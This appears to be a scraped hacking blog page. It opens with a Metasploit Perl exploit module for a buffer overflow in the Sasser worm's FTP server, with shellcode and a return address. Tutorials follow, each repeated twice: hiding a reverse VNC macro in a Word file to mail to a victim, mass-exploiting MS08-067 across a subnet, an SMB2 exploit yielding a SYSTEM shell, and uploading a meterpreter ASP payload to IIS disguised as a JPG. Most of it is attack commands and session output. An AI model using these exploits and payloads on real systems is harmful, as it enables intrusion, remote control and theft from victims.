By Attack Research
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::sasser_ftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'sasser worm avserve FTP server Overflow',
'Version' => '$Revision: 1 $',
'Authors' =>
[ 'valsmith [at] metasploit.net>',
'chamuco [at] gmail.com>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},
'Payload' =>
{
'Space' => 480,
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
Windows sasser worm avserve ftp server exploit.
}),
'Refs' =>
[
['OSVDB', '6197']
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows XP SP1', 0x77e7633a ],
],
'Keys' => ['ftp'],
'DisclosureDate' => 'not applicable',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /5\.0\.3/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected.");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}
# DOS request version
# my $request = "PORT" . "\x41"x500;
my $request = "PORT". "\x90"x268 . "\xeb\x06\x90\x90" . $target .
"\xe9".pack('V',-1005) . "\x90"x15 . $shellcode . "\x90"x1530;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
#$s->Send("$request\n");
$s->Send("$request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);
sleep(2);
return;
}
Saturday, August 20, 2011
Metasploit: Reverse VNC hidden in a Word file
Write :
Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user
Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,
there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router
Lets begin
1) Create a Macro to Intergate with word
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas
2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system
3)now in Backtrack type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E
When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
Video link for the above guide
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv
Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user
Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,
there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router
Lets begin
1) Create a Macro to Intergate with word
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas
2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system
3)now in Backtrack type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E
When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
Video link for the above guide
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv
Hacking Malware [Video Tut]
Hacking Malware [Video Tut]
http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info
HD Video
"Hacking Malware"
http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info
HD Video
"Hacking Malware"
Metasploit Mass Exploitation for Dummies
Write :
One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy!
One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Enjoy!
Hack Windows Vista with Metasploit
Write:
msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.
Now that we have identified two systems with SMB2 enabled, its exploit time!
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Voila! A great way to justify disabling SMB2 across your network.
Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.
For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:
C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.
msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.
Now that we have identified two systems with SMB2 enabled, its exploit time!
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Voila! A great way to justify disabling SMB2 across your network.
Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.
For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:
C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.
Exploiting Microsoft IIS with Metasploit
Write:
First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"
Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"
Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Subscribe to:
Posts (Atom)